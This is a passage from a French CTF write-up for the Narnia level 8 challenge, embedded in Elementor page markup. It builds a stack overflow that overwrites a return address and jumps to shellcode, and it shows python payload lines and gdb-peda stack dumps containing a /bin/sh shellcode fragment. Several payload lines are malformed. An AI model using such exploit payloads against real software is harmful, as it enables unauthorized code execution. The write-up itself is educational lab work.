elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-54954fd\" data-id=\"54954fd\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-08230a4 elementor-widget elementor-widget-text-editor\" data-id=\"08230a4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Sur la pile, on voit toujours notre chaine de &#8220;A&#8221;.<br \/><br \/><\/p><p>A l&#8217;adresse <code>0xffffd4e8<\/code>, alors que nous devrions toujours avoir notre argument, le pointeur vers celui-ci a \u00e9t\u00e9 \u00e9cras\u00e9, pour pointer vers une autre chaine (&#8220;=\/narnia&#8221;).<br \/><br \/><\/p><p>Sous cette adresse, en <code>0xfffd4ec<\/code>, il y a un autre pointeur, qui est peut-\u00eatre utilis\u00e9 pour le for, il ne vaut mieux pas la modifier. <br \/><br \/><\/p><p>Et enfin, nous avons l&#8217;adresse de retour vers la fonction main (<code>0xffffd4f0<\/code>). Cette adresse va s&#8217;av\u00e9rer tr\u00e8s utile puisqu&#8217;elle va nous permettre d&#8217;ex\u00e9cuter un shellcode <img decoding=\"async\" class=\"emoji\" role=\"img\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/1f609.svg\" alt=\"\ud83d\ude09\" \/>.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b3d27da elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b3d27da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-945c339\" data-id=\"945c339\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6f2b793 elementor-widget elementor-widget-heading\" data-id=\"6f2b793\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Construction de l'injection<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-47396d2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"47396d2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1c09e06\" data-id=\"1c09e06\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a902256 elementor-widget elementor-widget-text-editor\" data-id=\"a902256\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>L&#8217;objectif est donc de r\u00e9ussir \u00e0 \u00e9craser l&#8217;adresse de retour de main, pour mettre celle de notre shellcode \u00e0 la place, puis passer notre shellcode, tout ceci, sans provoquer de crash.<\/p><p>Notre injection va ainsi \u00eatre constitu\u00e9e de :<\/p><ul><li>20 &#8220;A&#8221; qui rempliront le buffer ;\u00a0<\/li><li>L&#8217;adresse de la chaine de caract\u00e8res de &#8220;A&#8221;, pour que l&#8217;injection puisse \u00eatre lue enti\u00e8rement ;<\/li><li>L&#8217;adresse 0xfffd4d8, remise telle quelle afin de ne pas provoquer de bug ;<\/li><li>L&#8217;adresse de retour de notre shellcode ;<\/li><li>Notre shellcode, d\u00e9j\u00e0 utilis\u00e9 dans de pr\u00e9c\u00e9dents challenges.<\/li><\/ul><p>Il est important de lancer le script avec une injection d\u00e9j\u00e0 \u00e0 la bonne taille : en effet, les adresses vont varier en cons\u00e9quence :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0005bb2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0005bb2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2582a3b\" data-id=\"2582a3b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-71989a7 elementor-widget elementor-widget-image\" data-id=\"71989a7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"321\" height=\"401\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1.png\" class=\"attachment-large size-large wp-image-789\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1.png 321w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/03\/stack.drawio-1-240x300.png 240w\" sizes=\"(max-width: 321px) 100vw, 321px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e101a2e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e101a2e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e887491\" data-id=\"e887491\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-28c7d48 elementor-widget elementor-widget-text-editor\" data-id=\"28c7d48\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Votre injection va ainsi ressembler \u00e0 ceci :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-090de07 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"090de07\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8e9254b\" data-id=\"8e9254b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3965169 elementor-widget elementor-widget-code-highlight\" data-id=\"3965169\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"A\"*20 + \"\\xff\\xff\\xff\\xff\" + \"\\xff\\xff\\xff\\xff\" + \"\\xff\\xff\\xff\\ff\" + \"\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-05a2f64 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"05a2f64\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ee1f443\" data-id=\"ee1f443\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-962f194 elementor-widget elementor-widget-text-editor\" data-id=\"962f194\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Rempla\u00e7ons maintenant les adresses par de vraies adresses :<\/p><p>Relancer le programme avec l&#8217;injection \u00e0 la bonne longueur, passer les instructions jusqu&#8217;\u00e0 ce que le programme ait lu 20 &#8220;A&#8221; et visualiser la stack \u00e0 l&#8217;aide de la commande :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a75f9be elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a75f9be\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-70b4cae\" data-id=\"70b4cae\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3123e10 elementor-widget elementor-widget-code-highlight\" data-id=\"3123e10\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>x\/16xw $esp\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3f0e989 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3f0e989\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8b6d3cc\" data-id=\"8b6d3cc\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5b1e8dd elementor-widget elementor-widget-code-highlight\" data-id=\"5b1e8dd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0xd8\r\nEBX: 0xf7fab000 --&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x14\r\nESI: 0xffffd574 --&gt; 0xffffd6c8 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ac --&gt; 0xffffd4b8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd494 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd494 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd498 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd49c ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4a0 (\"AAAAAAAA\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4a4 (\"AAAA\\330\\326\\377\\377\\270\\324\\377\\377\\021\\222\\004\\b\\330\\326\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4a8 --&gt; 0xffffd6d8 ('A' , \"\\330\\326\\377\\377\\270\\324\\377\\377\\264\\324\\377\\377\\061\\300\\061\\333\\061\\311\\061\\377\\260\\311\u0340f\\211\\303f\\211\\301\\061\\300\\260F\u03401\\300Ph\/\/shh\/bin\\211\\343\\211\\301\\211\u00b0\\v\u03401\\300\\260\\001\u0340\")\r\n0024| 0xffffd4ac --&gt; 0xffffd4b8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4b0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$ x\/16xw $esp\r\n0xffffd494:     0x41414141      0x41414141      0x41414141      0x41414141\r\n0xffffd4a4:     0x41414141      0xffffd6d8      0xffffd4b8      0x08049211\r\n0xffffd4b4:     0xffffd6d8      0xf7ffd020      0xf7da2519      0x00000002\r\n0xffffd4c4:     0xffffd574      0xffffd580      0xffffd4e0      0xf7fab000\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f7c757c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f7c757c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1ab68e8\" data-id=\"1ab68e8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ab6b206 elementor-widget elementor-widget-text-editor\" data-id=\"ab6b206\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Sur la pile, on voit bien 20 &#8220;A&#8221; (0x41) puis une adresse (<code>0xfffd6d8<\/code>\u00a0dans ce cas). Il s&#8217;agit de l&#8217;adresse de la chaine de &#8220;A&#8221;.<\/p><p>L&#8217;adresse suivante (<code>0xffffd4b8<\/code>) est une adresse que l&#8217;on peut retranscrire telle quelle. <br \/>Voici ce que donne la nouvelle injection :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8695b26 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8695b26\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-89300d4\" data-id=\"89300d4\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8040486 elementor-widget elementor-widget-code-highlight\" data-id=\"8040486\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c print(\"\\xd8\\xd6\\xff\\xff\" + \"\\b8\\d4\\xff\\xff\" + \"\\xff\\xff\\xff\\xff\" + \"\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b552b7f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b552b7f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-29ab48b\" data-id=\"29ab48b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-30d1a19 elementor-widget elementor-widget-text-editor\" data-id=\"30d1a19\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tOn peut maintenant d\u00e9duire l&#8217;adresse du shellcode. <br><br>\n\nOn sait que le shellcode est empil\u00e9 directement \u00e0 la suite de <code>0xffffd4b8<\/code>.<br><br>\n\nPour cela, il suffit de retirer 4 \u00e0 l&#8217;adresse pr\u00e9c\u00e9dente, pour obtenir l&#8217;adresse suivante : <br>\n<code>0xffffd4b8<\/code> &#8211; 4 = <code>0xffffd4d4<\/code>.<br><br>\n\nVoici donc \u00e0 quoi va ressembler l&#8217;injection finale pour ce cas-l\u00e0 :\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9849510 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9849510\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-05ba91d\" data-id=\"05ba91d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-abc2bff elementor-widget elementor-widget-code-highlight\" data-id=\"abc2bff\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>$(python2 -c 'print(\"A\"*20 + \"\\xd8\\xd6\\xff\\xff\" + \"\\xb8\\xd4\\xff\\xff\" + \"\\xb4\\xd4\\xff\\xff\" + \"shellcode\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ba2e04a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ba2e04a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b4f1613\" data-id=\"b4f1613\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3937157 elementor-widget elementor-widget-text-editor\" data-id=\"3937157\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>Je pr\u00e9cise toujours &#8220;<strong>pour ce cas-l\u00e0<\/strong>&#8221; car \u00e9videmment ces adresses peuvent varier, en fonction de plusieurs param\u00e8tres, notamment la longueur de votre shellcode.<br>\nA vous de trouver les valeurs pour votre cas !<\/blockquote>\n\nUne fois toutes les valeurs remplac\u00e9es, en ex\u00e9cutant le script en entier, vous devriez voir s&#8217;ex\u00e9cuter un shell au travers de peda. <br>\nCe shell n&#8217;est \u00e9videmment pas \u00e9lev\u00e9 en privil\u00e8ges, mais cela permet de v\u00e9rifier que votre injection est correcte.<br><br>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0b2d3da elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0b2d3da\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c78d7be\" data-id=\"c78d7be\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5bbb00a elementor-widget elementor-widget-heading\" data-id=\"5bbb00a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Injecter sans peda<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e7ec807 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e7ec807\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-450a9df\" data-id=\"450a9df\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-56998d1 elementor-widget elementor-widget-text-editor\" data-id=\"56998d1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>R\u00e9cup\u00e9rez votre injection et ex\u00e9cutez le programme avec.\u00a0<\/p><p>Que se-passe-t-il ? Normalement, cela ne fonctionne pas \ud83d\ude43.<\/p><p>Vous n&#8217;avez rien fait de mal, seulement, les adresses en dehors de peda ne sont pas les m\u00eames.<\/p><p>Il va falloir les remplacer.<\/p><p>Visualisez la pile \u00e0 l&#8217;aide de la commande :\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0389952 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0389952\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5441082\" data-id=\"5441082\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8abe3ca elementor-widget elementor-widget-code-highlight\" data-id=\"8abe3ca\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>.\/narnia8  | xxd<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9048a0e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9048a0e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3c9fcc7\" data-id=\"3c9fcc7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f62644b elementor-widget elementor-widget-text-editor\" data-id=\"f62644b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>La commande<strong> <code>xxd<\/code> <\/strong>permet de cr\u00e9er un hexdump du fichier, souvent dans le but de le reverse. Dans ce cas-l\u00e0, cela nous permet de visualiser une partie de la pile :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f0c8668 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f0c8668\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d6accfa\" data-id=\"d6accfa\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-35cdb61 elementor-widget elementor-widget-code-highlight\" data-id=\"35cdb61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre 